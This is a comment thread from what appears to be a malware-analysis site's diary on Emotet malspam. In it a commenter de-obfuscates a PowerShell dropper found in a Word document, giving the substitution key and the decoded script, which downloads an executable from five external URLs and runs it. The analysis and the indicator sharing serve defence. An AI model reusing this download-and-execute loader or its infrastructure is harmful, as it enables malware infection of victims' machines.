|
Introduction xx The malspam xx The traffic xx The malware xx Indicators of Compromise (IoCs) xx Final words Pcaps of the infection traffic and malware associated with today's diary can be found here. --- |
Brad 335 Posts ISC Handler |
| Reply Subscribe |
Jan 1st 1970 4 decades ago |
|
Document http://ciblage-spain[.]es/Transactions/01_19/ contained the following concatenated powershell string observed over two separate strings. (Analyzed with Didier's numbers-to-strings.py)
sEt sx=pow^%PdoB;IC:~5?1^%r^%SESSIOAZAZAME:~-4?1^%(^%TEMP:~-3?1^%ll $ConcreUIelj='SpA;ju'6$Border)dl=new-o`jecUI AZeUI.We`ClienUI6$PCIrd='(UIUIp://r[dinUIr[der.com/AZAOvd1X@(UIUIp://mypuppy)iUIUIer.com/Wcdo9i4Yd`H@(UIUIp://demo).UIec(noex[m.com/e(]w1`mlo@(UIUIp://UIimgi[mgi[.)iUIe/P7p4eo54pAB@(UIUIp://g[ropin-r-01.com/[dodof1TK('.SpliUI#'@'_6$UIurnkeyji='9[UI[iw'6$AZ[UIion[l[z = '882'6$SUIreeUIpv='gold[f'6$S[ving)AccounUIUIo=$env:pu`lic+'\'+$AZ[UIion[l[z+'.exe'6fore[c(#$p[ymenUI)) in $PCIrd_{UIry{$Border)dl.9ownlo[d,ile#$p[ymenUI))? $S[ving)AccounUIUIo_6$9irecUIorpp='B[`yMovie)wf'6If ##GeUI-IUIem $S[ving)AccounUIUIo_.lengUI( -ge 80000_ {Invoke-IUIem $S[ving)AccounUIUIo6$redund[nUIqj='invoicez)'6`re[k6}}c[UIc({}}$]u``err`='invoiced`'6&& SEt cU=!sx:pA=Q!&&set Qedo=!cU:AZ=N!&& SEt yA=!Qedo:UI=t!& seT pw=!yA:do=U!&& SET Oqb=!pw:(=h!& SEt Q4aC=!Oqb:#=(!&& SeT R64=!Q4aC:)=s!& SET Yo=!R64:`=b!&SEt hxfQ=!Yo:[=a!&& seT Xtk=!hxfQ:;=L!& sEt hYF=!Xtk:9=D!&& SEt yb=!hYF:_=)!&& sET xk=!yb:6=;!&& SeT CnA=!xk:]=R!& sEt 1JS=!CnA:,=F!& Set h1Z3=!1JS:?=,!&& eChO %h1Z3% |%ComMOnproGRaMFILeS(X86):~23,-11%%CommonPrOGRamFiLes:~9,1%%tEmp:~-15,-14% This sample is employing substitution. -------- Substitution Key # = ( AZ = N pA = Q [ = a ) = s ( = h UI = t ; = l ] = R ? = , 6 = ; , = F ` = b _ = ) 9 = D ? = , ] = r do = U -Substitution applied- set sx=pow%PuBLIC:~5F1%r%SESSIONNAME:~-4F1%h%TEMP:~-3F1%ll $Concretelj='SQLju';$Bordersdl=new-object Net.WebClient;$PCIrd='http://radintrader.com/NAOvd1X@http://mypuppysitter.com/WcuDi4YdbH@http://demos.technoexam.com/ehrw1bmlo@http://timgiamgia.site/P7p4eo54QB@http://garopin-r-01.com/auuf1TKh'.Split('@');$turnkeyji='Dataiw';$NationalN = '882';$Streetpv='goldaf';$SavingsAccountto=$env:public+'\'+$NationalN+'.exe';foreach($Payments) in $PCIrd){try{$Bordersdl.uwnloadFile($Payments)F $SavingsAccountto);$Directorpp='BabyMovieswf';If ((Get-Item $SavingsAccountto).length -ge 80000) {Invoke-Item $SavingsAccountto;$redundantqj='invoicezs';break;}}catch{}}$rubberrb='invoicedb'; -URL's- http://radintrader[.]com/NAOvd1X http://mypuppysitter[.]com/WcdoDi4YdbH http://demos.technoexam[.]com/ehrw1bmlo http://timgiamgia[.]site/P7p4eo54QB http://garopin-r-01[.]com/auuf1TKh Does anyone have an easier way of extracting the URL's? |
Vince 2 Posts |
| Quote |
Jan 17th 2019 4 months ago |
Quoting Vince:Does anyone have an easier way of extracting the URL's? Submit the downloaded Word document to app.any.run and use the "fakenet" option. That causes the document to attempt all of the URLs for the Emotet malware binary. |
Brad 335 Posts ISC Handler |
| Quote |
Jan 17th 2019 4 months ago |
Sign Up for Free or Log In to start participating in the conversation!
